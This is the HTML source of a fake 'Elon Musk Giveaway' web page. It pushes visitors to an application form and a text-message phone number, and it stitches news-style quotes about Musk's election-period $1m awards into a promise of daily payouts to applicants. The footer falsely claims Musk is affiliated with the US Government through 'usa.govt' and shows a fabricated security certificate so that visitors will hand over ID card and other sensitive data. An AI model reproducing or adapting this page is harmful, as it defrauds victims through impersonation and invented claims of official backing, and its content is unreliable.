<!Doctype html>
<html lang='en'>
<head>

<!-- HTML Meta Tags -->

<meta charset='UTF-8'>
<meta name='viewport' content='width=device-width, initial-scale=1.0'>
<meta name='author' content='Daniel ball'>
<meta name='keywords' content='HTML, CSS, JavaScript'>
<meta name='description' content='Its Elon Musk giveaway again, Dont miss out on this amazing opportunit!'>
<title>Elon Musk Giveaway</title>

<!-- Social Media Meta tags -->

<meta property='og:title' content="Elon Musk Giveaway">
<meta property='og:description' content='Its Elon Musk giveaway again, Dont miss out on this amazing opportunit!'>
<meta property='og:image' content='IMG_8454.JPG'>

<link rel='stylesheet' href='styles.css'>
<link rel="icon" type='image/x-icon' href="favicon.ico">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha512-SnH5WK+bZxgPHs44uWIX+LLJAJ9/2PkPKZ5QiAj6Ta86w+fsb2TkcmfRyVX3pBnMFcV7oQPJkl9QevSCWr3W6A==" crossorigin="anonymous" referrerpolicy="no-referrer" />


<style>
@import url('https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100..900;1,100..900&display=swap');

* {
padding: 0;
margin: 0;
box-sizing: border-box;
font-family: Montserrat;
}

header {
width: 100%;
height: 50px;
padding: 10px;
display: flex;
position: relative;
margin-bottom: 150px;
align-item: center;
justify-content: space-between;
box-shadow: 0 5px 10px gray;
background: white;
z-index: 99;
}

#menubar {
display: none;
}

header label {
font-size: 30px;
margin-left: 10px;
color: navy;
display: initial;
}

header img {
width: 80px;
position: absolute;
left: 40%;
}

header .register {
font-size: 30px;
margin-right: 10px;
color: navy;
}

header .navbar {
display: none;
position: absolute;
left: 0;
right: 0;
top: 100%;
background: navy;
box-shadow: 0 5px 10px darkblue;
width: 150px;
height: 250px;
padding: 10px;
justify-content: left;
}

header .navbar nav ul{
display: blcok;
list-style-type: none;
}

header .navbar nav ul li {
padding: 10px;
border-bottom: 1px solid white;
}

header .navbar nav ul li a{
text-decoration: none;
color: white;
font-size: 20px;
font-weight: 500;
}

header .navbar ul li:last-child {
border-bottom: none;
}

header .navbar button {
font-size: 20px;
font-weight: 500;
align-item: center;
border: 1px solid white;
border-radius: 10px;
background: white;
color: navy;
margin-top: 10px;
padding: 10px;
width: 100px;
}

#menubar:checked ~ .navbar {
display: initial;
}

 #home {
display: block;
position: relative;
width: 100%;
padding: 20px;
align-item: center;
line-height: 30px;
}

#home .h1 {
font-size: 40px;
font-weight: 500;
margin-bottom: 100px;
text-align: center;
color: navy;
line-height: 50px;
}

.apply {
width: 100%;
position: relative;
display: flex;
align-item: center;
justify-content: center;
}

.apply a {
color: white;
font-size: 30px;
font-weight: 600;
background: lightgreen;
padding: 10px;
cursor: pointer;
text-decoration: none;
}

.apply a:hover {
background: darkgreen;
color: white;
box-shadow: 0 5px 10px darkgreen;
}

#home p {
font-size: 18px;
font-weight: 500;
padding-bottom: 50px;
}

.winners {
width: 100%;
padding: 20px;
position: relative;
display: block;
}

.winners h2 {
font-size: 20px;
font-weight: 700;
padding-bottom: 30px;

}

.winners p {
font-size: 18px;
font-weight: 500;
}

.winners img {
width: 100%;
height: 250px
}

.winners i small {
font-weight: 500;
font-size: 13px;
color: gray;
}


.qoute {
width: 100%;
padding: 20px;
align-item: center;
line-height: 30px;
margin-bottom: 70px;
}

.qoute p {
font-size: 18px;
font-weight: 500;
}

.qoute h2 {
font-size: 20px;
font-weight: 700;
padding-bottom: 10px;
}



footer{
background-color: navy;
padding: 30px 30px 20px 15px;
}


footer h2 {
font-size: 25px;
font-weight: 500;
margin-bottom: 50px;
color: white;
line-height: 30px;
}

footer #contact h3 {
font-size: 20px;
font-weight: 500;
color: lightgreen;
}

footer #contact p {
font-size: 12px;
font-weight: 500;
}

footer p {
color: white;
font-size: 12px;
font-weight: 500;
}

</style>

</head>

<body>

<header>
<input type='checkbox' id='menubar' name='menubar'>
<label for='menubar'><i class="fa-solid fa-bars"></i></label>

<div class='navbar'>
<nav>
<ul>
<li><a href='#home'>Home</a></li>
<li><a href='#reason'>Reason</a></li>
<li><a href='#contact'>contact</a></li>

<li></li>
</ul>
</nav>

<a href='form.html'><button>Apply</button></a>
</div>

<a href='index.html'><img src='IMG_8466.jpg' alt='Logo' ></a>


<a href='form.html' class='register'><i class="fa-solid fa-user"></i></a>

</header>

<!-- section home -->

<section id='home' class='home'>
<p class='h1'>Be one of the lucky winners! Elon Musk’s giveaway is now live, scroll down to Apply.</p>

<div class='apply'><a href='form.html'>APPLY NOW!</a>
</div>

<br>
<br>
<br>

<p>
I think it's very important to have a feedback loop, where you're constantly thinking about what you've done and how you could be doing it better...I think that's the single biggest piece of advice: constantly think about how you could be doing things better and questioning yourself.
<br>
<br>
I'm planning to give away the majority of my wealth during my lifetime and beyond. It's very important to me that we use the resources of the world in a way that's wise.
</p>

</section>

<!-- Winner's --->

<div class='winners'>
<h2>Who are the winner's of Elon Musk giveaway?</h2>

<p><u>Kristine Fishell</u>: is one of the lucky winner's</p>

<img src='IMG_8410.JPG' alt='Kristine Fishell'>
<i><small>Elon Musk's promise to give out $1 million to each civilians for winning of election of his friend Donlad-Trump</small></i>

<br>
<br>
<br>
<br>

<p><u>Judey Kamora</u>: is one of the lucky winner's</p>
<img src='IMG_8449.JPG' alt='Judey Kamora'>
<i><small>Elon Musk awards $1,000,000 during an America PAC town hall in Lancaster, Pennsylvania, on Oct. 26.Photographer: Samuel Corum/Getty Images</small></i>
</div>


<div class='qoute'>
<p>Billionaire Elon Musk has <span style='color: darkblue'>pledged</span> to award $1m every day in the United States on November 5th to randomly selected, by his pro-Donald Trump America Political Action Committee (PAC) for won elcetion.
<br>
Musk announced the giveaway on Saturday at an America PAC-hosted rally in Harrisburg, Pennsylvania.</p>

<br>

<h2>Has Musk paid out any monuey yet?</h2>

<p>Since the tech billionaire’s announcement, Musk’s plan has already seen two recipients.</p>
<br>
<p>On Saturday, Musk announced the first winner moments after he announced the plan at the rally.</p>
<br>
<p>The winner, a red MAGA hat-clad man named John Dreher scampered through a roaring crowd towards the stage, his fists pumping the air.</p>
<br>
<p>“By the way, John had no idea,” Musk announced, handing an elated Dreher a cheque as a US flag appeared on a screen behind them.</p>
<br>
<p>On Sunday, Musk announced the second $1m winner, a woman named Kristine Fishell. Fishell donned a red shirt with a slogan for his friend Trump and his running mate, JD Vance, and cupped her hands around her face in disbelief.
So, what are you waiting for!</p>
<br>


<!-- section reason-->

<selection id='reason' class='reason'>
<h2>Why is Elon Musk giving away money?</h2>

<p>From November 5th till next year, Musk said he will give $1m to a randomly selected winner each day.</p>
<br>

<p>Musk, 53 – who is a founder and the CEO of the electric car company Tesla and rocket producer SpaceX and owns the social media network X – has a net worth of $274.4bn, according to the Forbes real-time billionaires list.
</p>
<br>

<p>As for my personal philanthropy, I think it's fairly well-known that I've donated to various causes, including science education, renewable energy, and children's hospitals...I also plan to donate substantially to the Mars Foundation, which will be focused on establishing a permanent, self-sustaining human presence on Mars.</p>
</section>

<br>
<br>
<br>
<br>

<div class='apply'>
<a href='form.html'>APPLY NOW!</a>
</div>

</div>




<footer>
<h2>Smarter, faster on what<br>matters.</h2>

<section id='contact'>
<h3>Contact:</h3>
<br>
<p>Text for more information.</p>
<br>
<p><i class="fa-regular fa-envelope"></i> (717) 573-1227</p>
</section>

<br>
<br>
<br>

<p>Powered by Elon Musk and United State of America Copyright <span class='icon'><i class="fa-regular fa-copyright fa-flip fa-2xs"></i></span> 2024</p>

<hr style='margin: 30px 0 30px 0;'>
<p> Elon musk is affiliated with the United States Government but not any other funding agency. usa.govt supplies training materials on how to apply for funding as well as resources on where to apply. </p>
<br>
<p>On sept.12th, 2024, usa.govt met the PCI data security requirements by passing a SecurityMetrics® Vulnerability Assessment.
<br>
<br>
usa.govt is tested quarterly to ensure that high security standards are maintained, which significantly reduces the risk that this site will be compromised and ID card or other sensitive data will be stolen or misused.
<br>
<br>
Disclaimer: This certificate confirms the site listed above has been tested for common security weaknesses and no significant security vulnerabilities were found at the date shown above. This certificate does not imply the website shown above is completely invulnerable to unauthorized attacks.</p>
</footer>


<script src="script.js"></script>

</body>
</html>
